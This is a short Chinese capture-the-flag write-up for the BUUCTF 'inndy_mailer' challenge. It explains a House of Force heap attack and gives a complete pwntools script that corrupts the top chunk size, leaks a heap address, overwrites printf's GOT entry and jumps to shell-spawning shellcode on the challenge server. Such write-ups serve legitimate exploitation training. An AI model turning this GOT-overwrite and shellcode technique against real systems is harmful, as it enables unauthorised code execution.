buuctf:inndy_mailer HOF的利用
上物理课的时候无聊，闲着往下滑打开了一道题，没想到拿了个一血。
简单题,house of force怼就完了
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force-zh/
程序没有对 size 做检查，首先考虑 HOF（house of force）。
任意堆溢出：把 top chunk 的 size 改为 0xffffffff，然后分配到 GOT 表上方。由于 printf 在最上面，把 printf 的 GOT 项改成 shellcode 地址即可；在堆上写 shellcode（堆有 rwx 权限），最后把 size 调一下就出了。
exp
from pwn import *
# Target selection: local == 1 spawns the binary under pwntools, anything
# else connects to the remote challenge instance.
local = 0
binary = "./mailer"
port = "27219"
p = process(binary) if local == 1 else remote("node3.buuoj.cn", port)
def dbg():
    """Switch pwntools to debug logging and open gdb in a horizontal tmux split.

    Only meant for local runs; it changes global pwntools ``context`` state and
    returns nothing.
    """
    context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'])
def add(size, title, content):
    """Drive menu action 1 (create a mail) on the global connection ``p``.

    Args:
        size: value sent in reply to the "Content Length:" prompt; the
            program does not validate it, which is what the write-up relies on.
        title: bytes sent at the "Title:" prompt.
        content: bytes sent at the "Content:" prompt.
    """
    dialogue = (
        ('Action: ', '1'),
        ('Content Length:', str(size)),
        ('Title:', title),
        ('Content:', content),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def show():
    """Select menu action 2 on the global connection ``p``.

    The caller then reads the program's output to recover a heap pointer.
    """
    list_action = '2'
    p.sendlineafter('Action: ', list_action)
# --- exploit flow (Python 2 era script: str and bytes are the same type) ---
context(arch = 'i386',os = 'linux')
shellcode = asm(shellcraft.sh())
print("len: %d" % len(shellcode))

# Chunk 1: shellcode padded to 0x40, followed by 0x50 as the size field of
# the following chunk (author's note: "use fwrite, to change size").
first_title = shellcode.ljust(0x40, 'a') + p32(0x50)
add(0x10, first_title, 'b' * 0x10)

# Chunk 2: the content runs past the chunk and rewrites the top chunk's size
# with 0xffffffff, so a later request of (almost) any length is carved from top.
# NOTE(review): glibc 2.29 and later abort with "malloc(): corrupted top size"
# when the top size exceeds the arena's system_mem, so this step only works on
# older libc builds; the challenge also needs no RELRO and an rwx heap.
second_content = 'd' * 0x20 + p32(0) + p32(0xffffffff)
add(0x20, 'cccc', second_content)

# Leak: after the 'b' * 0x10 content the listing apparently prints pointers;
# the third dword, minus 8, is taken as the heap base.
show()
p.recvuntil('b' * 0x10)
p.recv(4)
p.recv(4)
heap = u32(p.recv(4)) - 0x8
print("[*] heap: %s" % hex(heap))

elf = ELF(binary)
top_chunk = heap + 0xd0  # offset of the top chunk from the leaked base; verify under gdb
print("[*] top_chunk: %s" % hex(top_chunk))
distance = elf.got["printf"] - top_chunk
print("[*] distance: %s" % hex(distance))
# Subtract the chunk header/slack so the NEXT allocation lands on printf@got.
request = distance - 0x48 - 0x10
add(request, 'aaaa', 'bbbb')

# Allocation 4 overlaps the GOT: action 1, length 0x15, then a title that
# overwrites printf@got with a heap address (presumably the start of the
# shellcode inside chunk 1); the program's next printf call runs it.
p.sendline('1')
p.sendline(str(0x15))
p.sendline(p32(heap + 0xc))
# gdb.attach(p)  # debug hook, enable for local runs
p.interactive()